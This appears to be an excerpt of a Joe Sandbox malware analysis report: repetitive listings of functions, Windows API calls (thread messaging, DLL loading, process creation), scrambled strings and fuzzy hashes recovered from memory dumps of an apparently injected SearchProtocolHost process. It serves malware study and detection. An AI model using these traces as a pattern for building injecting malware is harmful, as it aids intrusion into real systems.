                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                                                                                                                  • API String ID: 1836367815-922563818
                                                                                                                                                                                  • Opcode ID: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                                                                                                                                                  • Instruction ID: 4cbc43905c08e4c9186aa54849c594b6bc4ec3e052083f810c782cbdae578ca0
                                                                                                                                                                                  • Opcode Fuzzy Hash: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                                                                                                                                                  • Instruction Fuzzy Hash: FB11C431D4025876EB21ABE49C42FEFBB7C9F51790F148054FA047B281D77866068BE6

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 534 1210a0-1210b0 535 1210b9-12110e call 13c220 call 124820 call 1113f0 call 131e20 534->535 536 1210b4 call 13b810 534->536 545 121130-121135 535->545 546 121110-121121 PostThreadMessageW 535->546 536->535 546->545 547 121123-12112d 546->547 547->545
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 0012111D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                                                                                                                  • API String ID: 1836367815-922563818
                                                                                                                                                                                  • Opcode ID: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                                                                                                                                                  • Instruction ID: ee55c3209f17e29ac3d23741f5fca25bc1a7548dd9faa42b6d61a2f1d9c9bb58
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E019671D4121876EB21E7A49C02FDFBB7C9F51B50F048054FB047B181E7746A068BE6
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 00133D1B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                                                                                  • Opcode ID: bd11e206bd162b61418908fde7cc6af85e48e0b7f9bbc4e4d4f4751761957dee
                                                                                                                                                                                  • Instruction ID: beacb0153c194c20f9aca01915fd277f9db4ca1c7f0746803b07a0f23cad274e
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd11e206bd162b61418908fde7cc6af85e48e0b7f9bbc4e4d4f4751761957dee
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A3181B1A00605BBD714EFA4CC81FEBBBB9EB88710F50851DF61DAB241D7746640CBA5
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                                  • String ID: @J7<
                                                                                                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                                                                                                  • Opcode ID: a011dada001af0ab0cd32fa7fc1d6a62eca248bead56f5f1d02a8c9b41a19f63
                                                                                                                                                                                  • Instruction ID: 8364e3340d24f551589a3574e965fe41c0aa8634410d3f16f5b8468493dd43e1
                                                                                                                                                                                  • Opcode Fuzzy Hash: a011dada001af0ab0cd32fa7fc1d6a62eca248bead56f5f1d02a8c9b41a19f63
                                                                                                                                                                                  • Instruction Fuzzy Hash: F33121B5A006199FDB10DFD8D8809EFB7B9BF88304F108569E605EB214D775EE058BA0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                                  • String ID: @J7<
                                                                                                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                                                                                                  • Opcode ID: ae9313da7f161ffccb725217d098db47be51ac62604412dc9d09675bbe1d632d
                                                                                                                                                                                  • Instruction ID: 56e8e81a4d954e788ee508a0ed2f629ba9d04076c169b98119638730aa77a3c9
                                                                                                                                                                                  • Opcode Fuzzy Hash: ae9313da7f161ffccb725217d098db47be51ac62604412dc9d09675bbe1d632d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B3130B5A0020A9FDB00DFD8D8809EFB7B9FF88304F108569E605EB214D775EE058BA0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00124892
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00124892
Memory Dump Source
• Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00124892
Memory Dump Source
• Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
APIs
• CreateProcessInternalW.KERNELBASE(?,?,?,?,001285DE,00000010,?,?,?,00000044,?,00000010,001285DE,?,?,?), ref: 00139B23
Memory Dump Source
• Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00119E81
Memory Dump Source
• Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00119E81
Memory Dump Source
• Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
APIs
• RtlAllocateHeap.NTDLL(00121D39,?,00135AD7,00121D39,0013582F,00135AD7,?,00121D39,0013582F,00001000,?,?,00000000), ref: 00139A1F
Memory Dump Source
• Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,7CB0E851,00000007,00000000,00000004,00000000,001240A6,000000F4), ref: 00139A6F
Memory Dump Source
• Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
APIs
• GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00128648
Memory Dump Source
• Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
APIs
• GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00128648
Memory Dump Source
• Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
APIs
• SetErrorMode.KERNELBASE(00008003,?,?,00122030,0013816F,0013582F,00121FF6), ref: 0012843F
Memory Dump Source
• Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00122030,0013816F,0013582F,00121FF6), ref: 0012843F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00124892
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145710263.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_9e0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145710263.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_9e0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                  • API String ID: 0-3558027158
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145710263.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_9e0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $Web$($hm$*661$*7*6$,FF5$-$Et$-$Ra$/$,O$1*4$$173*$3*71$4?$P$6$Ik$71/$Ik~m$LPIH$afOm$agok$evm+$fmha$hhe+$j+54$kqgl$oa$C$p+17$thaS$vwmk
                                                                                                                                                                                  • API String ID: 0-132586805
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B94655
                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B94742
                                                                                                                                                                                  • Execute=1, xrefs: 00B94713
                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B946FC
                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B94725
                                                                                                                                                                                  • ExecuteOptions, xrefs: 00B946A0
                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B94787
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                  • Opcode ID: b00ac53f80aee49e28ad02de77b54f3c37455928a8b831640b1dd3d297485bba
                                                                                                                                                                                  • Instruction ID: 7b1a566bfde5f37d0dd4904039579dcddc078c6b666f5f89733f0a5b3aaa0a2a
                                                                                                                                                                                  • Opcode Fuzzy Hash: b00ac53f80aee49e28ad02de77b54f3c37455928a8b831640b1dd3d297485bba
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9851F631744619AADF11ABA4FC8AFED77E8EB09301F1400E9E905A71D1EB709E498F51
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                  • Instruction ID: f10f45b227cb9b2f9e539f9a572e59930f1ebf5f534aad87648dfc8b0c813520
                                                                                                                                                                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 96023675508345AFC305CF18C491A6BBBE5EFC8700F1489ADFA899B261DB31E909CB82
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                  • Instruction ID: bc289b3b4f9f72000b0f5ee7447e8f3fa59dc76f5f1eb3170ccb930304d03a34
                                                                                                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                  • Instruction Fuzzy Hash: 79819E70E452499EDF249E68C891FFEBBF6EF95310F18419AE861E7291C7389CC08B50
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                                                  • Opcode ID: ca998306232a8c44cea3cc9e2cf1312c72920a748bf4183b285bba6b5542a4a5
                                                                                                                                                                                  • Instruction ID: 648795912106557ff18d4487d7a69c5b4e5e08d7dfc09edae747db73088816ed
                                                                                                                                                                                  • Opcode Fuzzy Hash: ca998306232a8c44cea3cc9e2cf1312c72920a748bf4183b285bba6b5542a4a5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 01215E76A00159ABDB10DF69CC41AEEBBF8EF68750F4441A6E915E3241FB309A018BA1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B902BD
                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B902E7
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 00B9031E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                  • Opcode ID: b19ad6f841b6f4f08b9c4908618d6dabcca5c851ce65323175aa99fc763228af
                                                                                                                                                                                  • Instruction ID: a488f2e959c5b85962d3afe8a726d8a75c0e16fe426833c76bdddf50bed9afc2
                                                                                                                                                                                  • Opcode Fuzzy Hash: b19ad6f841b6f4f08b9c4908618d6dabcca5c851ce65323175aa99fc763228af
                                                                                                                                                                                  • Instruction Fuzzy Hash: D9E1B030618742DFDB24DF28C885B2AB7E0FF49314F244AA9F5A58B2E1D774DA44DB42
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B97B7F
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 00B97B8E
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 00B97BAC
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                                                  • Opcode ID: a6795db47d305875d1122a03bbf69f078780bd68768f7708112656cfb106f5bd
                                                                                                                                                                                  • Instruction ID: a50a732e5d1a0e35dd1a7a4aa769a7863b5233a658028932f4abc071356518ce
                                                                                                                                                                                  • Opcode Fuzzy Hash: a6795db47d305875d1122a03bbf69f078780bd68768f7708112656cfb106f5bd
                                                                                                                                                                                  • Instruction Fuzzy Hash: DD4104317447029FCB20DE25CC51FAAB7E5EF89711F100AADF95ADB680DB70E8098B91
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B9728C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00B97294
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 00B972A3
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 00B972C1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                                                  • Opcode ID: 05be1cb89ae62e6e9905484dec232af57a0b674fe1dcccbeca51fcc76a03b14e
                                                                                                                                                                                  • Instruction ID: 983f660b3a4d5eb730553ebab2a0523a9b75e001c4e595c036982e0d32b6abf4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 05be1cb89ae62e6e9905484dec232af57a0b674fe1dcccbeca51fcc76a03b14e
                                                                                                                                                                                  • Instruction Fuzzy Hash: F4411231654606ABCB20DF64CC82F6AB7E1FF85711F2006A8FC55AB381DB30E81687D1
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                                                  • Opcode ID: b8e5f875beba4a115b0b4e597fbe1613405be7b787a807e4b4a6fb678818b8b8
